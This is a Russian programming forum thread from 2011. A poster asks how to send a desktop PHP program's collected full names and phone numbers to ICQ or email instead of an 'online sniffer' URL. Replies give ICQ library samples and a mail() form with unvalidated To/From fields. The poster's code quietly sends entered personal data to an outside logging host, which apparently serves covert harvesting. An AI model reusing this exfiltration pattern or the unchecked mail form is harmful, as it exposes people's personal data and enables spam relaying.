Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Скриптовые языки программирования > PHP
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 25.01.2011, 19:04   #1
Ganster777
 
Регистрация: 25.01.2011
Сообщений: 7
По умолчанию Отпрвка через PHP данных на асю

Здраствуйте уважаемые программисты и любители!)
вобщем у меня появился вопрос с PHP..
дело заключается в следущем,в программе PHP Devel Studio я сделал программу,в программе есть две строки с информацией:
ФИО-edit1
Телефон-edit2
после заполнения мы нажимаем кнопку отправить и информация идёт на онлайн сниффер..
вод код отправки на сниффер:

PHP код:
$edit1 c('Form1->edit1')->text;
$edit2 c('Form1->edit2')->text;
$url "тут у нас ссылка на сниффер";
file_get_contents($url "?" "FIO:" $edit1 "|tel:" $edit2);
MessageBox("Спасибо!Информация отправлена""Ошибка ввода"); 
мне нужно чтобы информация шла на аську или мыло(в крайнем случае)

как это воплотить,подскажите пожайлусто..
Ganster777 вне форума Ответить с цитированием
Старый 26.01.2011, 00:22   #2
xDyPx
Форумчанин
 
Аватар для xDyPx
 
Регистрация: 21.01.2009
Сообщений: 148
По умолчанию

Отправить на мыло:
Код:
<?php
// если была нажата кнопка "Отправить"
if($_POST['submit']) {
        // $_POST['title'] содержит данные из поля "Тема"
        $title = substr(htmlspecialchars(trim($_POST['title'])), 0, 1000);
        $mess =  substr(htmlspecialchars(trim($_POST['mess'])), 0, 1000000);
        // $to - кому отправляем
        $to = $_POST['to'];
        // $from - от кого
        $from= $_POST['from'];
        // функция, которая отправляет наше письмо.
        mail($to, $title, $mess, 'From:'.$from);
        echo 'Спасибо! Ваше письмо отправлено.';
}
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<title>Отправка письма</title>
</head>
<body width=100%;>
<form action="" method=post>

<p>Заполни все поля: <p>
              Teма:<br>
              <input type="text" name="title" size="40"><br />
              Сообщение:<br>
              <textarea name="mess" rows="10" cols="40"></textarea>
              <br />
			  Кому:<br>
              <input type="text" name="to" size="40"><br />
			  От кого:<br>
              <input type="text" name="from" size="40"><br />
              <input type="submit" value="Отправить" name="submit"></div>
</form> 
</body>
</html>
МОЙ САЙТ
Компьютер позволяет решать все те проблемы, которые до появления компьютера не существовали.
xDyPx вне форума Ответить с цитированием
Старый 26.01.2011, 11:14   #3
KLAXON
Пользователь
 
Регистрация: 17.06.2010
Сообщений: 50
По умолчанию

а с асей подобное не прокатит? не существует скриптов под это дело?
KLAXON вне форума Ответить с цитированием
Старый 26.01.2011, 11:24   #4
Cronos20
Форумчанин
 
Регистрация: 08.07.2010
Сообщений: 679
По умолчанию

Конечно нет
Cronos20 вне форума Ответить с цитированием
Старый 26.01.2011, 13:31   #5
Ganster777
 
Регистрация: 25.01.2011
Сообщений: 7
Радость

Цитата:
Сообщение от Cronos20 Посмотреть сообщение
Смотрел это..
но конкретно нечего не понял,т.к. в этом деле новичёк...
Вот скрипты и ссылки,может быть чтото сообразит:
Подробней о коде,который находится ниже можно почитать
тут
PHP код:
<?

require("mlICQ.php");

set_time_limit (0);
ignore_user_abort(true);

$mlCQ = new mlCQ();
$mlCQ->start_logging('huge.log');

$mlCQ->create_identity("me"'123456''superduperpassword');
$mlCQ->connect();
$mlCQ->login();

$mlCQ->set_status('ONLINE''DCDISABLED');
$mlCQ->request_offline_messages();
$mlCQ->delete_offline_messages();

// sample send message
$mlCQ->send_message(1991216"It works!");

$still_there true$code '';
while (
$still_there) {
    if (!
is_resource($mlCQ->sock) || feof($mlCQ->sock))
        
$still_there false;
    if (!
$codesleep(1);    // delay if no packet received last time
    
$code $mlCQ->dance_for('me');
    switch (
$code) {
        case 
7:
        
$msg $mlCQ->id['in_messages']['last'];
        
// new message received
        // more code here
            
break;
        case 
8:
        
$msg $mlCQ->id['in_messages']['last'];
        
// offline message received
        // more code here
            
break;
        default:
        
// ...
            
break;
    }
}

?>


Вот скрипт программы WebIcqLite: PHP класс для отправки и приема сообщений ICQ.Почитать о нём можно тут

PHP код:
<?php

    
include('WebIcqLite.class.php');

    
define('UIN'111111111);

    
define('PASSWORD''password');

    
$icq = new WebIcqLite();

    if(
$icq->connect(UINPASSWORD)){

        if(!
$icq->send_message('123456789''Hello from php!!!')){

            echo 
$icq->error;

        }else{

            echo 
'Message sent';

        }

        
$icq->disconnect();

    }else{

        echo 
$icq->error;

    }

?>


ну и вот тоже полезная информация про отправку на асю:
http://hacker-pro.net/text/index.php?mid=690
http://steelbot.net/


Может быть ктото всеже чтонибуть сообразит
Ganster777 вне форума Ответить с цитированием
Старый 26.01.2011, 13:59   #6
Cronos20
Форумчанин
 
Регистрация: 08.07.2010
Сообщений: 679
По умолчанию

Так а чего тут понимать?) Там по-моему написано все на доступном английском языке, суть которого можно понять и без знания программирования. Ясно же написано куда вставить UIN, пароль и сообщение.
Cronos20 вне форума Ответить с цитированием
Старый 26.01.2011, 14:03   #7
Ganster777
 
Регистрация: 25.01.2011
Сообщений: 7
По умолчанию

Цитата:
Сообщение от Cronos20 Посмотреть сообщение
Так а чего тут понимать?) Там по-моему написано все на доступном английском языке, суть которого можно понять и без знания программирования. Ясно же написано куда вставить UIN, пароль и сообщение.
Скажи свой уин,у меня есть пару вопросов...
Ganster777 вне форума Ответить с цитированием
Старый 28.01.2011, 13:13   #8
Ganster777
 
Регистрация: 25.01.2011
Сообщений: 7
По умолчанию

Кто может помочь,объяснить что и как,прошу написать свой скайп или асю..либо суда либо в ЛС
Ganster777 вне форума Ответить с цитированием
Старый 30.01.2011, 23:40   #9
ololo-schoolboy
Форумчанин
 
Регистрация: 25.12.2010
Сообщений: 247
По умолчанию

а что за извращенство с гуями ? по моему письма можно отправлять не только через клиент, но и через веб сайт, там уже сокет легко сделать
ololo-schoolboy вне форума Ответить с цитированием
Старый 05.02.2011, 09:14   #10
Ganster777
 
Регистрация: 25.01.2011
Сообщений: 7
По умолчанию

Цитата:
Сообщение от ololo-schoolboy Посмотреть сообщение
а что за извращенство с гуями ? по моему письма можно отправлять не только через клиент, но и через веб сайт, там уже сокет легко сделать
легко!-но не для всех...

кто может помоч-прошу писать в личку
Ganster777 вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Преобразовать ссылку через PHP fezilk25 PHP 16 21.08.2010 19:02
доступ по SSH через PHP Niodar PHP 4 18.02.2010 11:51
Кодировка при вводе данных через php-myadmin и sql запросы serg-php PHP 4 27.09.2009 17:03
сообщения в асю DeDoK Работа с сетью в Delphi 6 03.05.2009 10:35
как отправить сообщения на Асю (icq) Ermak Работа с сетью в Delphi 8 19.09.2007 19:57